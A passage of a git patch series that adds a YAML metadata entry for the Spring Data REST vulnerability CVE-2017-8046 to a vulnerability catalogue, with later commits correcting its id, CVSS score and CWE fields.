zFBa^-NBuHk|3n%84^e-yWdA+xmnr)vuJ3<=`xh4NzsLSEY5&AhBLB}O^w(Yf9s9?^ z`~NN5ztjJ Date: Mon, 10 Apr 2023 10:57:34 +0000 Subject: [PATCH 102/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/java-spring/2017/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/.keep diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep deleted file mode 100644 index e69de29b..00000000 From bb228576ac7469e44a68416099e66e36c5f26a4b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:58:50 +0000 Subject: [PATCH 103/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20ya?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/ya/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/ya/.keep diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep new file mode 100644 index 00000000..e69de29b From b7a0f2795b73f2728d4ec4df3187bb841adb661e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:03:55 +0000 Subject: [PATCH 104/109] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/ya/.keep | 0 cve/java-spring/2017/ya/CVE-2017-8046.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+) delete mode 100644 cve/java-spring/2017/ya/.keep create mode 100644 cve/java-spring/2017/ya/CVE-2017-8046.yaml diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml new file mode 100644 index 00000000..0d9f4311 --- /dev/null +++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-5398 +source: + https://github.com/m3ssap0/spring-break_cve-2017-8046 +info: + name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 + severity: high + description: | + 在2.5.12、2.6.7、3.0 RC3之前的Pivotal spring data rest版本、2.0.0M4之前的spring Boot版本以及Kay-RC3之前的spring data发布序列中,提交给spring data rest服务器的恶意PATCH请求可以使用特制的JSON数据来运行任意Java代码。 + scope-of-influence: + Pivotal spring data rest 2.5.x (<2.5.12) + spring Boot 2.0.x (<2.0.0) + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2017-8046 + cwe-id: CWE-494, CWE-79 + cnvd-id: None + kve-id: None + tags: cve2017, spring-framework, RFD \ No newline at end of file From aa7c0961d9834ba091dc3617bbfa7e5351175256 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:04:16 +0000 Subject: [PATCH 105/109] update cve/java-spring/2017/ya/CVE-2017-8046.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/ya/CVE-2017-8046.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml index 0d9f4311..2bef8c65 100644 --- a/cve/java-spring/2017/ya/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-5398 +id: CVE-2017-8046 source: https://github.com/m3ssap0/spring-break_cve-2017-8046 info: From d28c40771ef908fa2ddeda4af5dd66c518d8b480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:04:30 +0000 Subject: [PATCH 106/109] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/java-?= =?UTF-8?q?spring/2017/ya=20=E4=B8=BA=20cve/java-spring/2017/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml (100%) diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml similarity index 100% rename from cve/java-spring/2017/ya/CVE-2017-8046.yaml rename to cve/java-spring/2017/yaml/CVE-2017-8046.yaml From 5e5ed98e5eb089a5c5b4ec7e8f492fe55ee49bc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:07:25 +0000 Subject: [PATCH 107/109] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 211571f6..ece28b62 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -154,6 +154,7 @@ cve: redis: - CVE-2022-31144 java-spring: + - CVE-2017-8046 - CVE-2020-5398 - CVE-2022-22965 - CVE-2022-22963 From a4b145e95ff3b46fa60dbcefb15d726fe970af74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Tue, 11 Apr 2023 09:02:45 +0000 Subject: [PATCH 108/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/java-spring/2017/CVE-2017-8046/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/CVE-2017-8046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep deleted file mode 100644 index e69de29b..00000000 From 0b2817e23160f21104cbba4d53ac5da28568e318 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Tue, 11 Apr 2023 09:12:54 +0000 Subject: [PATCH 109/109] update cve/java-spring/2017/yaml/CVE-2017-8046.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/yaml/CVE-2017-8046.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml index 2bef8c65..c6b5f608 100644 --- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml @@ -12,10 +12,10 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.5 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2017-8046 - cwe-id: CWE-494, CWE-79 + cwe-id: CWE-20 cnvd-id: None kve-id: None - tags: cve2017, spring-framework, RFD \ No newline at end of file + tags: cve2017, spring-framework \ No newline at end of file